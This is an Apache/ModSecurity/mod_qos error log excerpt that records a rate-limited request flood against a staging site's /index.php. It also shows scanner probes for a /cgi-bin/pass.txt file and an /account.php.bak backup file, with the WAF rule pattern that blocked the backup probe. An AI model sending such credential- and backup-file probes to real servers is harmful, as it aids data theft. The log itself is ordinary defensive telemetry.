[Tue May 26 19:54:53.280709 2026] [security2:error] [pid 93576:tid 93796] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM2DRMqfxdEDkoszUAQAAAFQ"]
[Tue May 26 19:54:53.285885 2026] [security2:error] [pid 93868:tid 94289] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM0qK9k_ZUB2Vp25MRAAAAa4"]
[Tue May 26 19:54:53.292443 2026] [security2:error] [pid 93576:tid 93801] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM2DRMqfxdEDkoszT_QAAAFk"]
[Tue May 26 19:54:53.296034 2026] [security2:error] [pid 93576:tid 93825] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM2DRMqfxdEDkoszT8gAAAHE"]
[Tue May 26 19:54:53.302988 2026] [security2:error] [pid 93868:tid 94274] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM0qK9k_ZUB2Vp25MPwAAAZ8"]
[Tue May 26 19:54:53.303434 2026] [security2:error] [pid 93868:tid 94287] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM0qK9k_ZUB2Vp25MSAAAAaw"]
[Tue May 26 19:54:53.310111 2026] [security2:error] [pid 93868:tid 94298] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM0qK9k_ZUB2Vp25MRQAAAbc"]
[Tue May 26 19:54:53.316774 2026] [security2:error] [pid 93868:tid 94371] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM0qK9k_ZUB2Vp25MSgAAAgA"]
[Tue May 26 19:54:53.322832 2026] [cgid:error] [pid 93576:tid 93767] [client 185.177.72.53:50940] AH01264: stderr from /home1/pronuyyv/public_html/cgi-bin/pass.txt: script not found or unable to stat
[Tue May 26 19:54:53.328297 2026] [security2:error] [pid 86490:tid 86626] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM1ZMwN0DpLVWo6LHTgAAAIs"]
[Tue May 26 19:54:53.331722 2026] [security2:error] [pid 93868:tid 94353] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM0qK9k_ZUB2Vp25MRwAAAe4"]
[Tue May 26 19:54:53.335531 2026] [security2:error] [pid 93576:tid 93763] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNGDRMqfxdEDkoszUJAAAADM"]
[Tue May 26 19:54:53.338591 2026] [security2:error] [pid 93576:tid 93817] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM2DRMqfxdEDkoszUCwAAAGk"]
[Tue May 26 19:54:53.340862 2026] [security2:error] [pid 93576:tid 93834] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM2DRMqfxdEDkoszUDAAAAHo"]
[Tue May 26 19:54:53.343196 2026] [security2:error] [pid 93576:tid 93748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM2DRMqfxdEDkoszUCgAAACQ"]
[Tue May 26 19:54:53.343207 2026] [security2:error] [pid 93868:tid 94271] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM0qK9k_ZUB2Vp25MSQAAAZw"]
[Tue May 26 19:54:53.356072 2026] [security2:error] [pid 93868:tid 94369] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNEqK9k_ZUB2Vp25MXQAAAf4"]
[Tue May 26 19:54:53.358543 2026] [security2:error] [pid 93868:tid 94296] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM0qK9k_ZUB2Vp25MRgAAAbU"]
[Tue May 26 19:54:53.359299 2026] [security2:error] [pid 93576:tid 93787] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM2DRMqfxdEDkoszUCQAAAEs"]
[Tue May 26 19:54:53.371097 2026] [security2:error] [pid 93576:tid 93821] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNGDRMqfxdEDkoszUJQAAAG0"]
[Tue May 26 19:54:53.377840 2026] [security2:error] [pid 93576:tid 93813] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM2DRMqfxdEDkoszUDwAAAGU"]
[Tue May 26 19:54:53.389022 2026] [security2:error] [pid 93576:tid 93731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNGDRMqfxdEDkoszUKwAAABM"]
[Tue May 26 19:54:53.389096 2026] [security2:error] [pid 93576:tid 93770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNGDRMqfxdEDkoszUJwAAADo"]
[Tue May 26 19:54:53.400609 2026] [security2:error] [pid 93576:tid 93726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNGDRMqfxdEDkoszUKgAAAA4"]
[Tue May 26 19:54:53.400719 2026] [security2:error] [pid 86490:tid 86723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtM1ZMwN0DpLVWo6LHSwAAAOw"]
[Tue May 26 19:54:53.410076 2026] [security2:error] [pid 93576:tid 93757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNGDRMqfxdEDkoszUKAAAAC0"]
[Tue May 26 19:54:53.423915 2026] [security2:error] [pid 93576:tid 93818] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNGDRMqfxdEDkoszULQAAAGo"]
[Tue May 26 19:54:53.432352 2026] [security2:error] [pid 93868:tid 94340] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNEqK9k_ZUB2Vp25MbwAAAeE"]
[Tue May 26 19:54:53.435716 2026] [security2:error] [pid 93576:tid 93805] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNGDRMqfxdEDkoszULAAAAF0"]
[Tue May 26 19:54:53.442822 2026] [security2:error] [pid 93868:tid 94362] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNEqK9k_ZUB2Vp25MXwAAAfc"]
[Tue May 26 19:54:53.448712 2026] [security2:error] [pid 93868:tid 94328] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNEqK9k_ZUB2Vp25MagAAAdU"]
[Tue May 26 19:54:53.464477 2026] [security2:error] [pid 93576:tid 93720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNGDRMqfxdEDkoszUNAAAAAg"]
[Tue May 26 19:54:53.493307 2026] [security2:error] [pid 93868:tid 94293] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNEqK9k_ZUB2Vp25MaQAAAbI"]
[Tue May 26 19:54:53.634504 2026] [qos:error] [pid 86490:tid 86638] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNVZMwN0DpLVWo6LH8AAAAJc
[Tue May 26 19:54:53.641360 2026] [qos:error] [pid 86490:tid 86735] [client 45.148.10.120:59990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNVZMwN0DpLVWo6LH8gAAAPg
[Tue May 26 19:54:53.642107 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:49448] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNWDRMqfxdEDkoszUbgAAAHs
[Tue May 26 19:54:53.642563 2026] [qos:error] [pid 86490:tid 86671] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNVZMwN0DpLVWo6LH8wAAALg
[Tue May 26 19:54:53.644573 2026] [qos:error] [pid 86490:tid 86729] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtNVZMwN0DpLVWo6LH9AAAAPI
[Tue May 26 19:54:53.646549 2026] [qos:error] [pid 86490:tid 86626] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNVZMwN0DpLVWo6LH9gAAAIs
[Tue May 26 19:54:53.662886 2026] [qos:error] [pid 93868:tid 94351] [client 45.148.10.120:49478] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNUqK9k_ZUB2Vp25MuwAAAew
[Tue May 26 19:54:53.760281 2026] [qos:error] [pid 86490:tid 86680] [client 45.148.10.120:60150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNVZMwN0DpLVWo6LH9wAAAME
[Tue May 26 19:54:53.760554 2026] [qos:error] [pid 86490:tid 86643] [client 45.148.10.120:60140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNVZMwN0DpLVWo6LH-AAAAJw
[Tue May 26 19:54:53.769538 2026] [qos:error] [pid 93868:tid 94324] [client 45.148.10.120:60112] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNUqK9k_ZUB2Vp25MvAAAAdE
[Tue May 26 19:54:53.784395 2026] [qos:error] [pid 86490:tid 86620] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNVZMwN0DpLVWo6LH-QAAAIU
[Tue May 26 19:54:53.790576 2026] [qos:error] [pid 86490:tid 86738] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNVZMwN0DpLVWo6LH-gAAAPs
[Tue May 26 19:54:53.791375 2026] [qos:error] [pid 86490:tid 86696] [client 45.148.10.120:59990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNVZMwN0DpLVWo6LH-wAAANE
[Tue May 26 19:54:53.793448 2026] [qos:error] [pid 93576:tid 93743] [client 45.148.10.120:49448] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNWDRMqfxdEDkoszUcAAAAB8
[Tue May 26 19:54:53.795053 2026] [qos:error] [pid 86490:tid 86726] [client 45.148.10.120:60128] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNVZMwN0DpLVWo6LH_AAAAO8
[Tue May 26 19:54:53.795841 2026] [qos:error] [pid 86490:tid 86700] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNVZMwN0DpLVWo6LH_QAAANU
[Tue May 26 19:54:53.814941 2026] [qos:error] [pid 93868:tid 94285] [client 45.148.10.120:49478] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNUqK9k_ZUB2Vp25MvQAAAao
[Tue May 26 19:54:53.833311 2026] [security2:error] [pid 93576:tid 93768] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/account.php.bak"] [unique_id "ahWtNWDRMqfxdEDkoszUcQAAADg"]
[Tue May 26 19:54:53.913123 2026] [qos:error] [pid 86490:tid 86648] [client 45.148.10.120:60150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNVZMwN0DpLVWo6LIAAAAAKE
[Tue May 26 19:54:53.913181 2026] [qos:error] [pid 86490:tid 86654] [client 45.148.10.120:60140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtNVZMwN0DpLVWo6LIAQAAAKc
[Tue May 26 19:54:53.921471 2026] [qos:error] [pid 93868:tid 94306] [client 45.148.10.120:60112] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNUqK9k_ZUB2Vp25MvwAAAb8
[Tue May 26 19:54:53.935137 2026] [qos:error] [pid 86490:tid 86723] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNVZMwN0DpLVWo6LIAgAAAOw
[Tue May 26 19:54:53.942002 2026] [qos:error] [pid 86490:tid 86655] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNVZMwN0DpLVWo6LIAwAAAKg
[Tue May 26 19:54:53.944575 2026] [qos:error] [pid 86490:tid 86705] [client 45.148.10.120:60128] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNVZMwN0DpLVWo6LIBAAAANo
[Tue May 26 19:54:53.944943 2026] [qos:error] [pid 93576:tid 93829] [client 45.148.10.120:49448] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNWDRMqfxdEDkoszUcgAAAHU
[Tue May 26 19:54:53.946066 2026] [qos:error] [pid 86490:tid 86673] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNVZMwN0DpLVWo6LIBQAAALo
[Tue May 26 19:54:53.947300 2026] [qos:error] [pid 86490:tid 86709] [client 45.148.10.120:59990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNVZMwN0DpLVWo6LIBgAAAN4
[Tue May 26 19:54:53.965723 2026] [qos:error] [pid 93868:tid 94264] [client 45.148.10.120:49478] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNUqK9k_ZUB2Vp25MwAAAAZU
[Tue May 26 19:54:54.065239 2026] [qos:error] [pid 86490:tid 86676] [client 45.148.10.120:60150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNlZMwN0DpLVWo6LICgAAAL0
[Tue May 26 19:54:54.073399 2026] [qos:error] [pid 93868:tid 94326] [client 45.148.10.120:60112] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNkqK9k_ZUB2Vp25MwwAAAdM
[Tue May 26 19:54:54.079834 2026] [qos:error] [pid 86490:tid 86625] [client 45.148.10.120:60140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNlZMwN0DpLVWo6LICwAAAIo
[Tue May 26 19:54:54.084416 2026] [qos:error] [pid 86490:tid 86740] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNlZMwN0DpLVWo6LIDAAAAP0
[Tue May 26 19:54:54.090455 2026] [qos:error] [pid 86490:tid 86635] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNlZMwN0DpLVWo6LIDQAAAJQ
[Tue May 26 19:54:54.095455 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:49448] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNmDRMqfxdEDkoszUdAAAAE4
[Tue May 26 19:54:54.115101 2026] [qos:error] [pid 86490:tid 86662] [client 45.148.10.120:60128] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNlZMwN0DpLVWo6LIDgAAAK8
[Tue May 26 19:54:54.116138 2026] [qos:error] [pid 93868:tid 94366] [client 45.148.10.120:49478] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNkqK9k_ZUB2Vp25MxAAAAfs
[Tue May 26 19:54:54.117474 2026] [qos:error] [pid 86490:tid 86686] [client 45.148.10.120:59990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNlZMwN0DpLVWo6LIDwAAAMc
[Tue May 26 19:54:54.220737 2026] [qos:error] [pid 86490:tid 86710] [client 45.148.10.120:60150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNlZMwN0DpLVWo6LIEAAAAN8
[Tue May 26 19:54:54.225984 2026] [qos:error] [pid 93868:tid 94273] [client 45.148.10.120:60112] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNkqK9k_ZUB2Vp25MxQAAAZ4
[Tue May 26 19:54:54.231447 2026] [qos:error] [pid 86490:tid 86743] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNlZMwN0DpLVWo6LIEgAAAQA
[Tue May 26 19:54:54.231451 2026] [qos:error] [pid 86490:tid 86731] [client 45.148.10.120:60140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtNlZMwN0DpLVWo6LIEQAAAPQ
[Tue May 26 19:54:54.237600 2026] [qos:error] [pid 86490:tid 86745] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNlZMwN0DpLVWo6LIEwAAAQI
[Tue May 26 19:54:54.253871 2026] [qos:error] [pid 93576:tid 93715] [client 45.148.10.120:49448] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNmDRMqfxdEDkoszUdgAAAAM
[Tue May 26 19:54:54.264566 2026] [qos:error] [pid 86490:tid 86689] [client 45.148.10.120:60128] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNlZMwN0DpLVWo6LIFAAAAMo
[Tue May 26 19:54:54.266764 2026] [qos:error] [pid 86490:tid 86681] [client 45.148.10.120:59990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNlZMwN0DpLVWo6LIFQAAAMI
[Tue May 26 19:54:54.269166 2026] [qos:error] [pid 93868:tid 94356] [client 45.148.10.120:49478] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNkqK9k_ZUB2Vp25MxgAAAfE
[Tue May 26 19:54:54.278145 2026] [security2:error] [pid 93868:tid 94302] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNEqK9k_ZUB2Vp25McgAAAbs"]
[Tue May 26 19:54:54.281310 2026] [security2:error] [pid 93576:tid 93741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNGDRMqfxdEDkoszUNQAAAB0"]
[Tue May 26 19:54:54.283591 2026] [security2:error] [pid 93576:tid 93820] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNGDRMqfxdEDkoszUNgAAAGw"]
[Tue May 26 19:54:54.284529 2026] [security2:error] [pid 93576:tid 93826] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNGDRMqfxdEDkoszUOAAAAHI"]
[Tue May 26 19:54:54.288252 2026] [security2:error] [pid 93868:tid 94263] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNEqK9k_ZUB2Vp25MZgAAAZQ"]
[Tue May 26 19:54:54.289599 2026] [security2:error] [pid 93576:tid 93788] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNGDRMqfxdEDkoszULgAAAEw"]
[Tue May 26 19:54:54.290555 2026] [security2:error] [pid 93868:tid 94336] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNEqK9k_ZUB2Vp25McwAAAd0"]
[Tue May 26 19:54:54.293987 2026] [security2:error] [pid 93868:tid 94321] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNUqK9k_ZUB2Vp25MmAAAAc4"]
[Tue May 26 19:54:54.296672 2026] [security2:error] [pid 93868:tid 94258] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtNUqK9k_ZUB2Vp25MngAAAY8"]
